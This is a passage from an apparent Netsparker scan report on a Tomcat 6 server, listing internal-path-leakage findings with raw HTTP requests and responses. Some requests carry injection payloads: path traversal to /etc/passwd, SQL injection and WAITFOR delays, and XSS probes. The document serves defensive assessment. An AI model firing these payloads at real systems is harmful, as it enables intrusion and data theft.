…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><td height="1" wid…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><td height="1" wid…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA \ -keystore /path/to/my/keystore</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gi…specify a source of entropy. Productive system needs a reliable source of entropy but entropy may need a lot of time to be collected therefore test systems could use no blocking entropy sources like "/dev/urandom" that will allow quicker starts of Tomcat.</p><p>The final step is to configure the Connector in the <code>$CATALINA_BASE/conf/server.xml</code> file, where <code>$CATALINA_BASE</code> represents…L Coyote HTTP/1.1 Connector on port 8443 --><!--<Connector port="8443" maxThreads="200" scheme="https" secure="true" SSLEnabled="true" SSLCertificateFile="/usr/local/ssl/server.crt" SSLCertificateKeyFile="/usr/local/ssl/server.pem" clientAuth="optional" SSLProtocol="TLSv1"/>--></pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif">…

16.8. /docs/manager-howto.html
http://161.74.91.78:8080/docs/manager-howto.html

Identified Internal Path(s)
/usr/local/tomcat6/webapps/manager
/lib/catalina-ant.jar
Certainty
Request
GET /docs/manager-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/manager/status
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…/code> context configuration file in the <code>$CATALINA_BASE/conf/[enginename]/[hostname]</code> folder. Here is an example:</p><pre><Context path="/manager" privileged="true" docBase="/usr/local/tomcat6/webapps/manager"></Context></pre><p>If you have Tomcat configured to support multiple virtual hosts (websites) you would need to configure a Manager for each.</p><p>There are three ways to use the <st…version <strong>1.4</strong> or later.</li><li>Install the Ant distribution in a convenient directory (called ANT_HOME in the remainder of these instructions).</li><li>Copy the file <code>server/lib/catalina-ant.jar</code> from your Tomcat 6 installation into Ant's library directory (<code>$ANT_HOME/lib</code>). </li><li>Add the <code>$ANT_HOME/bin</code> directory to your <code>PATH</code> environm…

16.9. /docs/RELEASE-NOTES.txt
http://161.74.91.78:8080/docs/RELEASE-NOTES.txt

Identified Internal Path(s)
/lib/driver.jar
Certainty
Request
GET /docs/RELEASE-NOTES.txt HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
…=
In order to grant security permissions to JARs located inside the web application repository, use URLs of of the following format in your policy file:
file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar
============================
Symlinking static resources:
============================
By default, Unix symlinks will not work when used in a web application to link resources located outside the w…

16.10. /docs/config/host.html
http://161.74.91.78:8080/docs/config/host.html

Identified Internal Path(s)
/etc/passwd
Certainty
Request
GET /docs/config/host.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/realm-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…hat user's home directory on the server. You can accomplish the same thing in Catalina by using a special <strong>Listener</strong> element like this (on a Unix system that uses the <code>/etc/passwd</code> file to identify valid users):</p><div align="left"><table border="0" cellpadding="0" cellspacing="4"><tr><td height="1" width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" hei…if"></td><td height="1" width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="../images/void.gif"></td></tr></table></div> <p>On a server where <code>/etc/passwd</code> is not in use, you can request Catalina to consider all directories found in a specified base directory (such as <code>c:\Homes</code> in this example) to be considered "user home"…

16.11. /docs/appdev/processes.html
http://161.74.91.78:8080/docs/appdev/processes.html

Identified Internal Path(s)
/lib/catalina-ant.jar
/usr/local/apache-tomcat-6.0
Certainty
Request
GET /docs/appdev/processes.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/appdev/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…many web applications you plan to develop).</p><ul><li><em>Configure the Ant custom tasks</em>. The implementation code for the Ant custom tasks is in a JAR file named <code>$CATALINA_HOME/lib/catalina-ant.jar</code>, which must be copied in to the <code>lib</code> directory of your Ant installation. <br><br></li><li><em>Define one or more Tomcat users</em>. The <em>Manager</em> web applicati…1" width="1" alt="" src="../images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre># Context path to install this application on
app.path=/hello
# Tomcat 6 installation directory
catalina.home=/usr/local/apache-tomcat-6.0
# Manager webapp username and password
manager.username=myusername
manager.password=mypassword</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" a…

16.12. /docs/setup.html
http://161.74.91.78:8080/docs/setup.html

Identified Internal Path(s)
/usr/java
/bin/jsvc
/bin/bootstrap.jar
/bin/commons-daemon-1.0.x-native-src/unix/native/Tomcat5.sh
/etc/init.d

Certainty
Request
GET /docs/setup.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…nately, when calling the <code>./configure</code> script, the path of the JDK may be specified using the <code>--with-java</code> parameter, such as <code>./configure --with-java=/usr/java</code>.</p> <p>Using the following commands should result in a compiled jsvc binary, located in the <code>$CATALINA_HOME/bin</code> folder. This assumes that GNU TAR is used, and t…tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre> cd $CATALINA_HOME
./bin/jsvc -cp ./bin/bootstrap.jar \ -outfile ./logs/catalina.out -errfile ./logs/catalina.err \ org.apache.catalina.startup.Bootstrap</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" he…ode> will return the full jsvc usage information. In particular, the <code>-debug</code> option is useful to debug issues running jsvc.</p> <p>The file <code>$CATALINA_HOME/bin/commons-daemon-1.0.x-native-src/unix/native/Tomcat5.sh </code> can be used as a template for starting Tomcat automatically at boot time from <code>/etc/init.d</code>. The file is currently setup for running Tomcat 5.5.x, so it will be necessary to edit it a little.</p> <p>Note that the Commons-Daemon JAR file must be on your runtime classpath …

16.13. /docs/jndi-datasource-examples-howto.html
http://161.74.91.78:8080/docs/jndi-datasource-examples-howto.html

Identified Internal Path(s)
/lib/tomcat-dbcp.jar
Certainty
Request
GET /docs/jndi-datasource-examples-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…g/">Apache Commons</a> project. The following libraries are used:</p><ul><li>Commons DBCP</li><li>Commons Pool</li></ul><p>These libraries are located in a single JAR at <code>$CATALINA_HOME/lib/tomcat-dbcp.jar</code>. However, only the classes needed for connection pooling have been included, and the packages have been renamed to avoid interfering with applications.</p><p>DBCP 1.3 provides support for J…

16.14. /docs/virtual-hosting-howto.html
http://161.74.91.78:8080/docs/virtual-hosting-howto.html

Identified Internal Path(s)
/usr/local/tomcat
Certainty
Request
GET /docs/virtual-hosting-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…host names, <code>ren</code> and <code>stimpy</code>. Let's also assume one instance of Tomcat running, so <code>$CATALINA_HOME</code> refers to wherever it's installed, perhaps <code>/usr/local/tomcat</code>. </p> <p> Also, this how-to uses Unix-style path separators and commands; if you're on Windows modify accordingly. </p> </blockquote></td></tr></table><table cellpad…

16.15. /docs/config/listeners.html
http://161.74.91.78:8080/docs/config/listeners.html

Identified Internal Path(s)
/dev/urandom
Certainty
Request
GET /docs/config/listeners.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/jndi-datasource-examples-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…center" align="left"> <p>Entropy source used to seed the SSLEngine's PRNG. The default value is <code>builtin</code>. On development systems, you may want to set this to <code>/dev/urandom</code> to allow quicker start times.</p> </td></tr></table> </blockquote></td></tr></table> <table cellpadding="2" cellspacing="0" border="0"><tr><td bgcolor="#828DA6"><font face="arial,h…

16.16. /docs/cluster-howto.html
http://161.74.91.78:8080/docs/cluster-howto.html

Identified Internal Path(s)
/tmp/war-temp/
/tmp/war-deploy/
/tmp/war-listen/
Certainty
Request
GET /docs/cluster-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…<Valve className="org.apache.catalina.ha.session.JvmRouteBinderValve"/> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> <ClusterListener className="org.apache.catalina.ha.session.JvmRouteSessionIDBinderListener"/> <ClusterListener className="…filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/></Cluster> </pre></td><td width=…="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> </pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><…

16.17. /docs/class-loader-howto.html
http://161.74.91.78:8080/docs/class-loader-howto.html

Identified Internal Path(s)
/lib/ext
/bin/catalina.sh
/bin/bootstrap.jar
/bin/tomcat-juli.jar
/bin/commons-daemon.jar
Certainty
Request
GET /docs/class-loader-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
…This class loader contains the basic runtime classes provided by the Java Virtual Machine, plus any classes from JAR files present in the System Extensions directory (<code>$JAVA_HOME/jre/lib/ext</code>). <em>Note</em>: some JVMs may implement this as more than one class loader, or it may not be visible (as a class loader) at all.</p></li><li><p><strong>System</strong> — This …ATH</code> environment variable. All such classes are visible to both Tomcat internal classes, and to web applications. However, the standard Tomcat startup scripts (<code>$CATALINA_HOME/bin/catalina.sh</code> or <code>%CATALINA_HOME%\bin\catalina.bat</code>) totally ignore the contents of the <code>CLASSPATH</code> environment variable itself, and instead build the System class loader from the following repositories: </p> <ul> <li><p><em>$CATALINA_HOME/bin/bootstrap.jar</em> — Contains the main() method that is used to initialize the Tomcat server, and the class loader implementation classes it depends on.</p></li> <li><p><em>$CATALINA_BASE/bin/tomcat-juli.jar</em> and <em>$CATALINA_HOME/bin/tomcat-juli.jar</em> — Logging implementation classes. These include enhancement classes to <code>java.util.logging</code> API, known as Tomcat JULI, and a package-renamed copy of Apache Commons Logging library used internally by Tomcat. See <a href="logging.html">logging documentation</a> for more details.</p></li> <li><p><em>$CATALINA_HOME/bin/commons-daemon.jar</em> — The classes from <a href="http://commons.apache.org/daemon/">Apache Commons Daemon</a> project.</p></li> </ul> <p>The <em>tomcat-juli.jar</em> and <em>commons-dae….sh</code> scripts, but are referenced from the manifest file of <em>bootstrap.jar</em>.
</p> <p>If <em>$CATALINA_BASE</em> and <em>$CATALINA_HOME</em> do differ and <em>$CATALINA_BASE/bin/tomcat-juli.jar</em> does exist, the startup scripts will add it to <code>CLASSPATH</code> before <em>bootstrap.jar</em>, so that Java will look into <em>$CATALINA_BASE/bin/tomcat-juli.jar</em> for classes before it will look into <em>$CATALINA_HOME/bin/tomcat-juli.jar</em> referenced by <em>bootstrap.jar</em>. It should work in most cases but, if you are using such configuration, it might be recommended to remove <em>tomcat-juli.jar</em> from <em>$CATA…
16.18. /examples/jsp/sessions/carts.jsp
http://161.74.91.78:8080/examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%..
Identified Internal Path(s)
/etc/httpd/logs/error.log
Certainty
Request
GET /examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%0a&submit=body%7Bx:expression(netsparker(0x00054B))%7D HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/jsp/sessions/carts.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate

Response
…AR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' <li>../../../../../../../../../../etc/httpd/logs/error.log </ol></FONT><hr><html><!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for addition…
16.19. /docs/monitoring.html
http://161.74.91.78:8080/docs/monitoring.html
Identified Internal Path(s)
/bin/catalina-tasks.xml
Certainty
Request
GET /docs/monitoring.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…</echo> </target> </project> </pre></p> </td></tr></table> <p><b>import:</b> Import the JMX Accessor Project with <em><import file="${CATALINA.HOME}/bin/catalina-tasks.xml" /></em> and reference the tasks with <em>jmxOpen</em>, <em>jmxSet</em>, <em>jmxGet</em>, <em>jmxQuery</em>, <em>jmxInvoke</em>, <em>jmxEquals</em> and <em>jmxCondition</em>. </p> </block…
16.20. /docs/config/cluster-sender.html
http://161.74.91.78:8080/docs/config/cluster-sender.html
Identified Internal Path(s)
/net/Socket.html#setTrafficClass(int
Certainty
Request
GET /docs/config/cluster-sender.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/cluster-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…value is between 0 and 255. Default value is <code>int soTrafficClass = 0x04 | 0x08 | 0x010;</code> Different values are defined in <a href="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setTrafficClass(int)"> java.net.Socket#setTrafficClass(int)</a>. </td></tr><tr><td valign="center" align="left"><code>tcpNoDelay</code></td><td valign="center" align="left"> Boolean value for the soc…
16.21. /docs/logging.html
http://161.74.91.78:8080/docs/logging.html
Identified Internal Path(s)
/lib/logging.properties
/bin/tomcat-juli.jar
Certainty
Request
GET /docs/logging.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…va.util.logging.config.file</code> System property which is set by the startup scripts. If it is not readable or is not configured, the default is to use the <code>${java.home}/lib/logging.properties</code> file in the JRE. </li> <li>In the web application. The file will be <code>WEB-INF/classes/logging.properties</code> </li> </ul> </p><p> The default <code…<li>Put <code>log4j.jar</code> and <code>tomcat-juli-adapters.jar</code> from "extras" into <code>$CATALINA_HOME/lib</code>.</li> <li>Replace <code>$CATALINA_HOME/bin/tomcat-juli.jar</code> with <code>tomcat-juli.jar</code> from "extras".</li> </ul> </li> <li><p>If you are running Tomcat with separate $CATALINA_HOME and $CATALINA_BASE an…code>tomcat-juli-adapters.jar</code> from "extras" into <code>$CATALINA_BASE/lib</code></li> <li>Put <code>tomcat-juli.jar</code> from "extras" as <code>$CATALINA_BASE/bin/tomcat-juli.jar</code></li> <li>If you are running with a <a href="security-manager-howto.html">security manager</a>, you would need to edit the <code>$CATALINA_BASE/conf/cata…s still referenced by manifest of <code>bootstrap.jar</code> and thus will be implicitly present on Tomcat's classpath. The startup scripts configure <code>$CATALINA_BASE/bin/tomcat-juli.jar</code> to be earlier on the classpath than <code>bootstrap.jar</code>, and so it should have higher priority. Thus it should be OK, but consider removing the unneeded co…
16.22. /docs/config/http.html
http://161.74.91.78:8080/docs/config/http.html
Identified Internal Path(s)
/net/Socket.html#setPerformancePreferences(int,
Certainty
Request
GET /docs/config/http.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/ssl-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…tionTime</code></td><td valign="center" align="left"> <p>(int)The first value for the performance settings. Default is <code>1</code>, see <a href="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center" align="left"><code>socket.performanceLatency</code></td><td valign="center" align="left"> <p>(int)The second value for the performance settings. Default is <code>0</code>, see <a href="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center" align="left"><code>socket.performanceBandwidth</code></td><td valign="center" align="left"> <p>(int)The third value for the performance settings. Default is <code>1</code>, see <a href="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center" align="left"><code>selectorPool.maxSelectors</code></td><td valign="center" align="left"> <p>(int)The…
16.23. /examples/servlets/servlet/SessionExample
http://161.74.91.78:8080/examples/servlets/servlet/SessionExample
Identified Internal Path(s)
/etc/httpd/logs/error.log
Certainty
Request
POST /examples/servlets/servlet/SessionExample HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/servlets/servlet/SessionExample
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: hTTp://netsparker.com/n=3; NSFTW=3; //netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3; netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3; $Version=1; Smith="'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; CHAR(109)=
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded

dataname=Smith&datavalue='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'

Response
…CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) = 3<br>expr 268409241 - 2 & = bar<br>../../../../../../../../../../etc/httpd/logs/error.log = bar<br>'{${print(int)0xFFF9999-22}}' = bar<br><script>ns(0x000998)</script> = bar<br>1;WAITFOR DELAY '0:0:25'-- = bar<br>';WAITFOR DELAY '0:0:25'-- = bar<br>netsparker(0x0009…
16.24. /examples/servlets/servlet/RequestHeaderExample
http://161.74.91.78:8080/examples/servlets/servlet/RequestHeaderExample
Identified Internal Path(s)
/etc/passwd
Certainty
Request
GET /examples/servlets/servlet/RequestHeaderExample HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/servlets/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: //netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3; netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3; '+netsparker(0x0009BE)+'=3; "+netsparker(0x0009C0)+"=3; $Version=1; Smith="netsparker(0x0009D9) "; JSESSIONID=7AF9251B247E1F37635C69CF62872A4A; CHAR(109)=
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 11:28:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 1830
Content-Type: text/html

<html><body bgcolor="white"><head><title>Request Header Example</title></head><body><a href="../reqheaders.html"><img src="../images/code.gif" height=24 width=24 align=right border=0 alt="view code"></a><a href="../index.html"><img src="../images/return.gif" height=24 width=24 align=right border=0 alt="return"></a><h3>Request Header Example</h3><table border=0><tr><td bgcolor="#CCCCCC">referer</td><td>http://161.74.91.78:8080/examples/servlets/</td></tr><tr><td bgcolor="#CCCCCC">accept</td><td>text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5</td></tr><tr><td bgcolor="#CCCCCC">user-agent</td><td>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)</td></tr><tr><td bgcolor="#CCCCCC">cache-control</td><td>no-cache</td></tr><tr><td bgcolor="#CCCCCC">accept-language</td><td>en-us,en;q=0.5</td></tr><tr><td bgcolor="#CCCCCC">host</td><td>161.74.91.78:8080</td></tr><tr><td bgcolor="#CCCCCC">cookie</td><td>//netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3;netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3;<script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3; '+netsparker(0x0009BE)+'=3;"+netsparker(0x0009C0)+"=3; $Version=1; Smith=" netsparker(0x0009D9) "; JSESSIONID=7AF9251B247E1F37635C69CF62872A4A; CHAR(109)=</td></tr><tr><td bgcolor="#CCCCCC">accept-encoding</td><td>gzip, deflate</td></tr></table>
16.25. /docs/config/cluster-receiver.html
http://161.74.91.78:8080/docs/config/cluster-receiver.html
Identified Internal Path(s)
/net/Socket.html#setTrafficClass(int
Certainty
Request
GET /docs/config/cluster-receiver.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/cluster-howto.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…lign="center" align="left"> Sets the traffic class level for the socket, the value is between 0 and 255. Different values are defined in <a href="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setTrafficClass(int)"> java.net.Socket#setTrafficClass(int)</a>. </td></tr><tr><td valign="center" align="left"><code>tcpNoDelay</code></td><td valign="center" align="left"> Boolean value for the socket TC…
7 TOTAL INFORMATION
17. [Possible] Internal Path Leakage (Windows)
Netsparker identified an internal path in the document.
Impact
There is no direct impact; however, this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this file path was actually the real file path of the target web server.
Error messages should be disabled. Remove this kind of sensitive data from the output.
External References
OWASP - Full Path Disclosure
Classification
PCI v1.2-6.5.6, CWE-200, CAPEC-118, WASC-13
17.1. /docs/html-manager-howto.html
http://161.74.91.78:8080/docs/html-manager-howto.html
Identified Internal Path(s)
C:\path\to\foo
C:/path/to/foo
C:\path\to\application\foobar
C:/path/to/context.xml
Certainty
Request
